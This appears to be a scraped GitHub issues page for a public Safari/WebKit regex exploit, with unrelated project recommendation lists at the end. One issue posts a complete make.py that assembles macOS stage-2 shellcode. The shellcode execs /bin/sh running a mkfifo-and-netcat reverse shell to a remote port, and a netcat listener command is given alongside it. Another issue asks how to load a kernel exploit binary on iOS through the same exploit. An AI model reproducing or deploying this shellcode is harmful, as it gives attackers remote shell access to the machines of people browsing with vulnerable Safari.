webkit-regex-exploit's Issues
Thank you
Thank you
Questions about the shellcode
Hello, I have some questions about it .
When I change the shellcode(such as run a command use execve syscall ) in the stage2, and run make.py, the safari cannot works well.
So, how to change the shellcode to run a command?
When I use lldb to attach the safari and debug it , I write int 3
int the shellcode but the lldb cannot stop at 0xcc. If I use lldb to attach it , where should I set breakpoints to test the shellcode?
Wish for you reply. Thank you.
make.py
#!/usr/bin/env python
import subprocess
from string import Template
str_to_print = "Hello world from Assembly!\n"
# Generate payload
template = """
.intel_syntax noprefix
.text
.macro putchar chr
lea rax, [rip+3f]
mov qword ptr [rip+reentry_function], rax
movabs rax, 0xFFFF000000000000+\chr
ret
3:
.endmacro
.globl start
start:
$buf
cmp qword ptr [rip+reentry_function], 0
je 3f
mov rax, qword ptr [rip+reentry_function]
jmp rax
3:
$payload
// Return value
movabs rax, 0xFFFF000000000000
ret
.data
.globl reentry_function
reentry_function:
.quad 0
"""
payload = ""
for c in str_to_print:
payload += "putchar %d\n"%(ord(c))
buf = '''
xor rax, rax
mov rax,0x2
ror rax, 0x28
or rax, 59
mov rcx, rax
xor rdx, rdx
mov rbx, 0x68732f2f6e69622f
push rdx
push rbx
push rsp
pop rdi
push rdx
mov rbx, 0x632d
push rdx
push rbx
push rsp
pop rbx
push rdx
; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 127.0.0.1 7777 > /tmp/f
; nc -lv 0.0.0.0 7777
mov rcx, 0x66
push rcx
mov rcx, 0x2f706d742f203e20
push rcx
mov rcx, 0x3737373720363032
push rcx
mov rcx, 0x2e34342e3031322e
push rcx
mov rcx, 0x303120636e7c3126
push rcx
mov rcx, 0x3e3220692d206873
push rcx
mov rcx, 0x2f6e69622f7c662f
push rcx
mov rcx, 0x706d742f20746163
push rcx
mov rcx, 0x3b662f706d742f20
push rcx
mov rcx, 0x6f6669666b6d3b66
push rcx
mov rcx, 0x2f706d742f206d72
push rcx
push rsp
pop rcx
push rdx
push rcx
push rbx
push rdi
push rsp
pop rsi
syscall
'''
payload = Template(template).substitute(payload=payload, buf=buf)
# payload = Template(template).substitute(payload=payload)
# Write payload
f = open("stage2_macOS.S", "w+")
f.write(payload)
f.close()
# Build payload
subprocess.check_call(['clang', '-nostdlib', '-static', 'stage2_macOS.S', '-o', 'stage2_macOS.o'])
subprocess.check_call(['gobjcopy', '-O', 'binary', 'stage2_macOS.o', 'stage2_macOS.bin'])
# Delete the generated source and binary
subprocess.check_call(['rm', 'stage2_macOS.S'])
subprocess.check_call(['rm', 'stage2_macOS.o'])
iOS shellcode loading
I dmed you personally on twitter but you have yet to answer so I opened an issue here instead, how would I got about without writing a macho loader to for example lold a kernel exploit binary via this exploit ?
Clarification on README.md
Hi,
I apologize if I am misreading/misunderstanding but you state in your README.md:
This is an exploit for the latest version of Safari (as of Dec. 6 2018). Fixed in the current WebKit release, therefore I decided to make this public.
-
What exactly do you mean by its fixed in current release of WebKit? Is the WebKit release not pushed out to IOS/Mac OS yet or something? I am not too familiar with the Apple Environment so I apologize. Does IOS update its WebKit version independent of IOS Updates or would there need to be a new version of IOS to fix this?
-
Is the vulnerability only for Safari specifically or for all WebKit based browsers?
-
What WebKit version fixes this?
-
Is there a CVE for this?
Thank you and incredible job on this!
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
๐ Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. ๐๐๐
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google โค๏ธ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.